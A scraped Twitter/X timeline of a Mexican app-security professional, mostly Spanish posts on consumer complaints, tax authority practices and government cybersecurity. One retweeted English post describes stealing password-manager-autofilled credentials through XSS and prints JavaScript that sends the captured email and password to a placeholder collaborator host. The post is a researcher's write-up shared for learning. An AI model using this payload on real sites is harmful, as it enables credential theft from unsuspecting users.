Juan Carlos Calderon

290 posts

Juan Carlos Calderon banner
Juan Carlos Calderon

Juan Carlos Calderon

@JCMaxSec

App Sec expert and OWASP fan.

Mexico 参加日 Aralık 2009
126 フォロー中96 フォロワー
Juan Carlos Calderon
Juan Carlos Calderon@JCMaxSec·
@MotorpasionMex ¿tienen el dato de quejas de profeco por año? saber cuales marcas se van consolidando y cuales son "pura lengua", sería muuuy valioso. Y eso de que ya solo quedan 10% de quejas de JAC, ,meh..., igual se tuvieron que poner todas esas quejas para que hicieran caso!
Español
0
0
0
1
Juan Carlos Calderon がリツイート
Borealix
Borealix@BorealixSec·
🌟 Borealix en el México Business Summit 2025 🌐 👥 Gracias a todos los asistentes por las valiosas interacciones y oportunidades de colaboración. #MéxicoBusinessSummit #Ciberseguridad #InnovaciónDigital #Networking #Borealix
Borealix tweet mediaBorealix tweet mediaBorealix tweet mediaBorealix tweet media
Español
0
2
2
34
Juan Carlos Calderon
Juan Carlos Calderon@JCMaxSec·
@mARQcello Ha, ha, ha, mientras estoy de acuerdo con respecto a lo de andar haciendo "juntas de pueblo", me ha gustado el manejo que le han dado a la situación hasta ahora. No estoy de acuerdo en todo, pero si me ha gustado el manejo de la situacion hasta ahora :)
Español
0
0
1
9
Marcello Montes Skertchly
Marcello Montes Skertchly@mARQcello·
Casi una semana para disfrutar lo votado y prepararse para "responder a la nación" yendo al zócalo, a mostrar que el pueblo de México está unido y es fuerte. Gobierno Cutre.
Español
1
0
0
11
Juan Carlos Calderon がリツイート
Luke Stephens (hakluke)
Someone just sent me an XSS to collaborate on. It was an interesting case so I thought I'd tweet about it. They'd found an xss in auth.example.com, which was a subdomain that is only used to authenticate users. They were having trouble escalating the XSS because this subdomain has no access to the main application at app.example.com, or the API it interacts with, which is at api.example.com. I immediately thought of something that I'd heard recently (maybe on @ctbbpodcast?) where you can use an XSS to steal auto-filled plaintext credentials, so I thought I'd try to replicate this. First, injected a fake login form, like this:
This is good enough to have a password manager automatically fill the credentials if it is injected into any page on the correct domain. Now we just needed to send the credentials to the attacker server, I wrote some basic JS to do this: setTimeout(function(){ httpRequest = new XMLHttpRequest(); httpRequest.open('GET', 'https://BURP_COLLABORATOR?'+document.getElementById("email").value+"="+document.getElementById("password").value); httpRequest.send();},2000) The timeout is required because it takes a while for the password manager to autofill the passwords. Then I used the XSS to inject the form, and the JavaScript, and voila! Plaintext credentials. This isn't a new technique, I can see there are a bunch of other articles about it - but it's the first time I've exploited an XSS to steal creds from a password manager like this, so I figured some others would find it interesting.
English
13
100
426
40.3K
Juan Carlos Calderon がリツイート
Javier Matuk
Javier Matuk@jmatuk·
Aparentemente hackearon @WhatsApp y robaron 487 millones de números de teléfono de cuentas activas de todo el mundo. Están a la venta por miles de dólares, y según @CyberNews, se ha corroborado que la base de datos es real. Recomiendan activar la verificación en 2 pasos.
Javier Matuk tweet media
Español
99
1.9K
3.9K
0
Juan Carlos Calderon
Juan Carlos Calderon@JCMaxSec·
@Mel_Ys_Ao Si tengo el derecho, pero.... ¿y la voilación de la ley que? para el SAT o sus funcionarioes ni siquiera es hay una palmadita en la mano, todo se queda en mera letra escrita. ¿Donde queda la moralidad tambien?
Español
0
0
0
0
Mel
Mel@Mel_Ys_Ao·
@JCMaxSec Tienes derecho a recibir el pago de los intereses generados sobre el importe actualizado a partir de la fecha de vencimiento, al ser devolución extemporánea.
Español
1
0
0
0
SATMX
SATMX@SATMX·
¡Denuncia! En el SAT hay cero tolerancia para quien comete prácticas ilegales. Sin tregua contra la corrupción.
SATMX tweet media
Español
67
40
130
0
Juan Carlos Calderon
Juan Carlos Calderon@JCMaxSec·
@MarioBeteta Es enorme la productividad y dinero perdido en esta "insistencia". Creo que hay mejores maneras, como que el patrón haga una validación masiva de los datos de los empleados y luego entrege constancias a cada trabajador, eso ahorarria muchisimo trabajo a todos
Español
0
0
0
0
OSCAR MARIO BETETA
OSCAR MARIO BETETA@MarioBeteta·
“Uno de los objetivos del SAT es que cada contribuyente se haga responsable de su situación fiscal. Por eso insisten en hacer la entrega directa a los trabajadores y no a los empleados de la información fiscal”.
Español
1
0
1
0
Juan Carlos Calderon
Juan Carlos Calderon@JCMaxSec·
@pcoronaf Ojalá sacarán el manual de ciberseguridad para gobierno. Algunos sitios ni siquiera tienen firewall, menos otras prácticas
GIF
Español
0
0
0
0